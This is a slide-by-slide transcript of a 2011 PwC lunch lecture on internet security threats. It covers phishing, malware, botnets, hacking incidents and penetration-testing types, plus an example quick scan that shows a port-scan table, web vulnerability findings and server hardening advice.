pwc lunchlezing inter-actief - the internet - what is out there
TRANSCRIPT
The Internet –What is out there?
Lunchlezing Inter-Actief25 oktober 2011Enschede
www.pwc.nl
PwC
Introduction
2
PwC 3
PwC 4
PwC 5
PwC
• Information security is a continuous process which allows organizations to have control over the IT security risks, i.e. risks related to the loss of availability, integrity and confidentiality of information.
• Protecting critical business assets
• Organization, technology, humans
• CIA – DAD triad
Introduction
6
PwC
• In 2009 there were 159 recorded incidents of unauthorized access to critical business data by hackers.
• What about the unrecorded incidents?
Introduction
7
PwC
Developments in security threats and what you can do about it
8
PwC
Developments in security threats
What do we see in practice regarding online security threats?
Cybercrime (incl. botnets, phishing)
Malware (incl. viruses, trojans)
Hacking
9
PwC
Cybercrime
What is cybercrime?
The Council of Europe's Cybercrime Treaty uses the term 'cybercrime' to refer to offenses ranging from criminal activity against data to content and copyright infringement [Krone, 2005].
However, others [Zeviar-Geese, 1997-98] suggest that the definition is broader, including activities such as fraud, unauthorized access, child pornography, and cyberstalking.
The United Nations Manual on the Prevention and Control of Computer Related Crime includes fraud, forgery, and unauthorized access [United Nations, 1995] in its cybercrime definition.
10
PwC
Cybercrime
So cybercrime can cover a very wide range of attacks. Understanding this wide variation in types of cybercrime is important as different types of cybercrime require different approaches to improving your computer safety.
We often see:
Phishing
Malware
Botnets
11
PwC
Example
12
PwC
Phishing
Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.
Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.
Phishing is an example of social engineering techniques used to deceive users.
13
PwC 14
PwC
Example
15
PwC
Example
16
PwC
Malware
Malware includes:
Computer viruses
Worms
Trojan horses
Scareware
Rootkits
….and other malicious software or programs.
17
PwC
Malware
18
Source: GOVCERT.NL
PwC
Malware
Computer viruses: these are programs that can attach themselves to files (.exe, .com) thereby infecting computers. Need human interaction to run.
Worms: are self-replicating programs and can copy themselves to different computers, making use of network connectivity and known exploits for software vulnerabilities. Run without human interaction.
19
PwC 20
PwC
Malware
Trojan horses: legitimate looking files creating backdoors on a computer. Trojans often perform a desirable function for the user, opening access to the system without their knowledge.
Rootkits: a rootkit is a program which hides activity and processes on a computer. It is often used in combination with a worm or Trojan horse to conceal their activity.
Interesting read on rootkits:http://blogs.technet.com/b/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx
21
PwC
Malware
22
PwC
Malware
Scareware: comprises several classes of software with malicious payloads, or payloads of limited or no benefit, that are sold to consumers via certain unethical marketing practices. The selling approach uses social engineering to cause shock, anxiety or the perception of a threat.
23
PwC
Malware world-wide concentrations 2010
24
Source for this image and the statistics on following slides: Microsoft‟s Security Intelligence Report (www.microsoft.com/sir)
PwC
Malware – metrics Netherlands 2010
25
PwC
Malware – metrics Netherlands 2010
26
PwC
Botnets
27
Computers become nodes ina botnet when attackers illicitly install malware that secretly connects the computers to the botnet.
They perform tasks such as sending spam, hosting or distributing malwareor other illegal files, or attacking other computers.
Attackers usually install bots byexploiting vulnerabilities in software or by using social engineering tactics to trick users into installing the malware.
Users are often unaware that their computers are being used for malicious purposes.
PwC
Botnet software for sale on the black market
28
PwC
Drive-by downloads
29
PwC
Detected security breaches Q3 2009 – Q4 2010
Hacking
30
PwC
Hacking
Wikileaks became world news when it published sensitive information about the war in Afghanistan, including the US airstrike video that killed a dozen people, including reporters and children.
Around December 2010, they began releasing 251,000 diplomatic cables, this became known as „Cablegate‟
The founder of Wikileaks, Julian Assange, is arrested.
Several companies froze activities for Wikileaks.
31
PwC 32
PwC 33
PwC 34
PwC
Hacking
Recent hacks with high impact:
35
PwC
Hacking
Hacker groups are rising in number and activity.
Publishing passwords, internal network schemes and databases to the public.
One hacker group recentlydisclosed 62,000 credentials,Sony‟s network scheme, etc.
36
PwC
Hacking
Software vulnerabilities are one of the most important causes for successful hacks.
Solution: install patches and updates for operating system and 3rd party software.
37
PwC
Hacking
Trends in security:
• Vulnerabilities are moving towards web application level
• Loss of data due to cyber crime is a structural problem
• Obsolescence of cryptography is underestimated
• Websites are on the retina‟s of criminals, disgruntled employees, journalists and competitors
(source: GOVCERT)
38
PwC
Hacking
A penetration test is the process of identifying and actively exploiting vulnerabilities in an information technology environment. Penetration tests…
• should be performed by experienced professionals.
• are much more than an automated vulnerability scan.
• are typically performed by penetration testers with very limited knowledge of the target environment (to emulate common external threats).
• are sometimes referred to as an “attack and penetration study”, “pentest”, or “ethical hack”.
• entail automated and manual testing procedures.
• should be performed on – at least – an annual basis.
39
PwC
Hacking
Internet-based penetration testing
• Security testing focused on Internet-facing corporate resources.
• Goal is to gain access to the “crown jewels” within the internal network via Internet-facing resources.
• Most companies have publicly accessible network address space.
• Validation of the IP address ranges supplied by client and network footprint scanning.
• Examine the weaknesses found, analyze susceptibility to attacks, and attempt to exploit vulnerabilities.
Wireless penetration testing
• Security testing focused on the wireless environment.
• Goal is to gain access to the “crown jewels” in the internal network via the wireless infrastructure.
• Wireless networks have become very common and pose significant security risks.
• Wireless access point identification and mapping.
• Active penetration testing from publicly accessible areas.
40
PwC
Hacking
Dial-up penetration testing
• Security testing is focused on dial up devices.
• Goal is to gain access to the “crown jewels” in the internal network via dialup resources.
• Unauthorized or insecure dial-up devices.
• Automated software to dial the supplied telephone ranges to identify carriers.
• Active penetration testing of identified dial-up devices.
Web application penetration testing
• Security testing is focused on external and internal web-based applications.
• Goal is to gain privileged access to the application or to gain access to other users‟ data within the application.
• Supplied varying profiles or access levels.
• Focused on application level vulnerabilities (OWASP).
41
PwC
Hacking
Physical security controls testing
• Security testing is focused on gaining physical access to corporate facilities, data centers, or other secured locations.
• Typically involves an element of social engineering.
Internal penetration testing
• Security testing is focused on internal systems, applications, databases, and network infrastructure.
• Goal is to gain access to the “crown jewels” within the internal network.
• Testing performed on the internal network perimeter simulating threats posed by employees and third parties with physical access to the facility.
• Performed according to the same methodology and approach as the Internet-based penetration testing phase.
42
PwC
Vulnerability scanner
43
PwC
Application vulnerabilities OWASP Top 10
44Source: The Open Web Application Security Project (OWASP) – https://www.owasp.org/
PwC
Application vulnerabilities OWASP Top 10
45
PwC
OWASP application level scanner
46
PwC
The anatomy of a security quick scan
47
PwC
Anatomy of a security quick scan
Example quick scan performed on:
Firewall
Website
Windows 2003 servers
48
PwC
Approach
First, we‟ve looked at the filtering of the firewall, e.g. what entry points are open and which routes are blocked?
49
PwC
Firewall – external at service provider
50
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
465/tcp open ssl/smtp qmail smtpd
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
3306/tcp open mysql MySQL 4.1.22
5432/tcp open postgresql PostgreSQL DB 7.4.12 - 7.4.25
8443/tcp open http Apache httpd
So what? What‟s the problem with this?
PwC
Firewall – external at service provider
51
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
465/tcp open ssl/smtp qmail smtpd
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
3306/tcp open mysql MySQL 4.1.22
5432/tcp open postgresql PostgreSQL DB 7.4.12 - 7.4.25
8443/tcp open http Apache httpd
E-mail server
Secure e-mail
Databases
PwC
Approach
The open ports are found, now let‟s see if there are any known vulnerabilities for the listening services.
We have done this by using a vulnerability scanner.
52
PwC
Vulnerability scanner
53
PwC
Vulnerability scanner
54
PwC
Approach
Next, we have analyzed the website for known vulnerabilities according to the OWASP list.
We have done this by using an application layer vulnerability scanner.
55
PwC 56
PwC
Vulnerabilities with high risk on the website:
Outdated software (Apache, PHP)
Cross site scripting (XSS)
Injection flaws
Can lead to:
Unauthorized access
Website defacement (reputational damage)
57
PwC
SQL manipulation
58
PwC
SQL manipulation
59
PwC
Internal servers
60
PwC 61
PwC
Internal servers
Most important recommendations for the Windows platform:
Password settings can be strengthened
Audit settings can be improved
Available services on servers can be more restrictive
62
Questions?
© 2011 PwC. All rights reserved. Not for further distribution without the permission of PwC.
"PwC" refers to the network of member firms of PricewaterhouseCoopers International Limited
(PwCIL), or, as the context requires, individual member firms of the PwC network. Each
member firm is a separate legal entity and does not act as agent of PwCIL or any other
member firm. PwCIL does not provide any services to clients. PwCIL is not responsible or
liable for the acts or omissions of any of its member firms nor can it control the exercise of their
professional judgment or bind them in any way. No member firm is responsible or liable for the
acts or omissions of any other member firm nor can it control the exercise of another member
firm's professional judgment or bind another member firm or PwCIL in any way.
Damiën Meijer
Manager
PwC
088 - 792 58 77